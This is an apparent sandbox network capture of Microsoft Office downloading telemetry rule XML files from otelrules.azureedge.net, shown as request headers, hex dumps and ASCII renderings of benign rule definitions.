                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:18 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 450
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080618Z-174f7845968xr5c2hC1EWRd0hn0000000dm0000000001fum
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    3192.168.2.74970813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:18 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 3788
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 24868834-401e-002a-5e69-40c62e000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080618Z-174f7845968glpgnhC1EWR7uec0000000wrg00000000av59
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    4192.168.2.74971113.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:18 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 2160
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080618Z-174f7845968vqt9xhC1EWRgten0000000wkg00000000dckc
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    5192.168.2.74971013.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:18 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 2980
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080618Z-174f7845968nxc96hC1EWRspw80000000w9g00000000b1yw
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:18 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    6192.168.2.74971313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:20 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:20 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 408
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080620Z-174f7845968qj8jrhC1EWRh41s0000000wpg000000001nt5
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:20 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    7192.168.2.74971413.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:20 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:20 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080620Z-174f7845968px8v7hC1EWR08ng0000000wxg000000004t1r
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:21 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    8192.168.2.74971613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:20 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:20 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080620Z-174f7845968xlwnmhC1EWR0sv80000000wd000000000bv76
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    9192.168.2.74971713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:20 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:20 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 632
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080620Z-174f7845968xlwnmhC1EWR0sv80000000wf0000000006b1g
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:21 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    10192.168.2.74971513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:20 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:20 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080620Z-174f7845968n2hr8hC1EWR9cag0000000w7000000000at0p
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
